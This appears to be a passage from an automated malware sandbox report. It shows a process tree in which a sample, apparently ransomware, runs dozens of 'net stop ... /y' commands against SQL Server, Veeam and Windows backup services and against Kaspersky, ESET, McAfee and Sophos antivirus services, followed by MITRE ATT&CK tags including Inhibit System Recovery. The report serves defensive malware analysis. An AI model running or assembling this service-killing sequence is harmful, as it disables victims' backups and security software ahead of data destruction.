- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:1928
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
      4⤵
      PID:1888
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:268
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:1080
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
      4⤵
      PID:1976
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:1760
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:1792
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
      4⤵
      PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$SQL_2008 /y
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SQL_2008 /y
    3⤵
    PID:1568
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
      4⤵
      PID:1624
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:1156
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:1640
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
      4⤵
      PID:1152
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$TPS /y
  2⤵
  PID:784
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$TPS /y
    3⤵
    PID:2008
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPS /y
      4⤵
      PID:1584
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$TPSAMA /y
  2⤵
  PID:528
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$TPSAMA /y
    3⤵
    PID:1172
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
      4⤵
      PID:556
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:1768
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:580
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:464
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:276
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
      4⤵
      PID:1060
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLBrowser /y
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\net.exe
    net stop SQLBrowser /y
    3⤵
    PID:1540
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser /y
      4⤵
      PID:332
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLSafeOLRService /y
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\net.exe
    net stop SQLSafeOLRService /y
    3⤵
    PID:1176
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLSafeOLRService /y
      4⤵
      PID:1116
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLSERVERAGENT /y
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\net.exe
    net stop SQLSERVERAGENT /y
    3⤵
    PID:1800
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT /y
      4⤵
      PID:1772
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLTELEMETRY /y
  2⤵
  PID:1664
- - C:\Windows\SysWOW64\net.exe
    net stop SQLTELEMETRY /y
    3⤵
    PID:1900
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY /y
      4⤵
      PID:1416
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:2032
- - C:\Windows\SysWOW64\net.exe
    net stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:364
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:1652
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLWriter /y
  2⤵
  PID:1424
- - C:\Windows\SysWOW64\net.exe
    net stop SQLWriter /y
    3⤵
    PID:1148
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLWriter /y
      4⤵
      PID:1304
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamBackupSvc /y
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamBackupSvc /y
    3⤵
    PID:1960
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamBackupSvc /y
      4⤵
      PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamBrokerSvc /y
  2⤵
  PID:820
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamBrokerSvc /y
    3⤵
    PID:1592
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamBrokerSvc /y
      4⤵
      PID:1660
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamCatalogSvc /y
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamCatalogSvc /y
    3⤵
    PID:1560
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamCatalogSvc /y
      4⤵
      PID:1372
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamCloudSvc /y
  2⤵
  PID:828
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamCloudSvc /y
    3⤵
    PID:1032
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamCloudSvc /y
      4⤵
      PID:1128
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamDeploymentService /y
  2⤵
  PID:1576
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamDeploymentService /y
    3⤵
    PID:1604
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:2012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamDeploySvc /y
  2⤵
  PID:556
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamDeploySvc /y
    3⤵
    PID:1688
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploySvc /y
      4⤵
      PID:1496
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:664
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:520
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:892
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamMountSvc /y
  2⤵
  PID:1060
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamMountSvc /y
    3⤵
    PID:1572
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamMountSvc /y
      4⤵
      PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamNFSSvc /y
  2⤵
  PID:332
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamNFSSvc /y
    3⤵
    PID:1920
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:1072
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamRESTSvc /y
  2⤵
  PID:1116
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamRESTSvc /y
    3⤵
    PID:1504
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamRESTSvc /y
      4⤵
      PID:676
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamTransportSvc /y
  2⤵
  PID:1772
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamTransportSvc /y
    3⤵
    PID:1916
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:1864
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop W3Svc /y
  2⤵
  PID:1416
- - C:\Windows\SysWOW64\net.exe
    net stop W3Svc /y
    3⤵
    PID:1968
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop W3Svc /y
      4⤵
      PID:1140
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop wbengine /y
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\net.exe
    net stop wbengine /y
    3⤵
    PID:1836
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:1824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop WRSVC /y
  2⤵
  PID:1304
- - C:\Windows\SysWOW64\net.exe
    net stop WRSVC /y
    3⤵
    PID:1424
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WRSVC /y
      4⤵
      PID:1764
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:2024
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:1752
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:1632
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:1792
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:1028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop VeeamHvIntegrationSvc /y
  2⤵
  PID:1088
- - C:\Windows\SysWOW64\net.exe
    net stop VeeamHvIntegrationSvc /y
    3⤵
    PID:2016
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
      4⤵
      PID:2000
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop swi_update /y
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\net.exe
    net stop swi_update /y
    3⤵
    PID:1596
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop swi_update /y
      4⤵
      PID:836
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$CXDB /y
  2⤵
  PID:112
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$CXDB /y
    3⤵
    PID:1600
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CXDB /y
      4⤵
      PID:528
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:560
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
      4⤵
      PID:1768
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "SQL Backups" /y
  2⤵
  PID:1120
- - C:\Windows\SysWOW64\net.exe
    net stop "SQL Backups" /y
    3⤵
    PID:1280
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "SQL Backups" /y
      4⤵
      PID:464
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$PROD /y
  2⤵
  PID:1880
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$PROD /y
    3⤵
    PID:240
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROD /y
      4⤵
      PID:1440
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "Zoolz 2 Service" /y
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\net.exe
    net stop "Zoolz 2 Service" /y
    3⤵
    PID:1648
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
      4⤵
      PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLServerADHelper /y
  2⤵
  PID:1936
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper /y
    3⤵
    PID:1860
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper /y
      4⤵
      PID:1384
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$PROD /y
  2⤵
  PID:1884
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$PROD /y
    3⤵
    PID:1908
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROD /y
      4⤵
      PID:1664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop msftesql$PROD /y
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\net.exe
    net stop msftesql$PROD /y
    3⤵
    PID:1872
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop msftesql$PROD /y
      4⤵
      PID:2032
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop NetMsmqActivator /y
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\net.exe
    net stop NetMsmqActivator /y
    3⤵
    PID:1980
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop NetMsmqActivator /y
      4⤵
      PID:1928
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop EhttpSrv /y
  2⤵
  PID:620
- - C:\Windows\SysWOW64\net.exe
    net stop EhttpSrv /y
    3⤵
    PID:1888
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EhttpSrv /y
      4⤵
      PID:1080
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ekrn /y
  2⤵
  PID:1672
- - C:\Windows\SysWOW64\net.exe
    net stop ekrn /y
    3⤵
    PID:1976
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ekrn /y
      4⤵
      PID:1760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ESHASRV /y
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\net.exe
    net stop ESHASRV /y
    3⤵
    PID:1660
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ESHASRV /y
      4⤵
      PID:1624
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$SOPHOS /y
  2⤵
  PID:876
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SOPHOS /y
    3⤵
    PID:2020
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
      4⤵
      PID:1152
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$SOPHOS /y
  2⤵
  PID:884
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SOPHOS /y
    3⤵
    PID:828
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
      4⤵
      PID:1584
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop AVP /y
  2⤵
  PID:1364
- - C:\Windows\SysWOW64\net.exe
    net stop AVP /y
    3⤵
    PID:1576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AVP /y
      4⤵
      PID:1264
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop klnagent /y
  2⤵
  PID:1608
- - C:\Windows\SysWOW64\net.exe
    net stop klnagent /y
    3⤵
    PID:556
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop klnagent /y
      4⤵
      PID:1580
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:792
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:1488
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:1048
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:1856
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:1068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
      4⤵
      PID:1788
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop wbengine /y
  2⤵
  PID:1380
- - C:\Windows\SysWOW64\net.exe
    net stop wbengine /y
    3⤵
    PID:332
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:1076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop mfefire /y
  2⤵
  PID:572
- - C:\Windows\SysWOW64\net.exe
    net stop mfefire /y
    3⤵
    PID:1504
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mfefire /y
      4⤵
      PID:1804

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1536

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads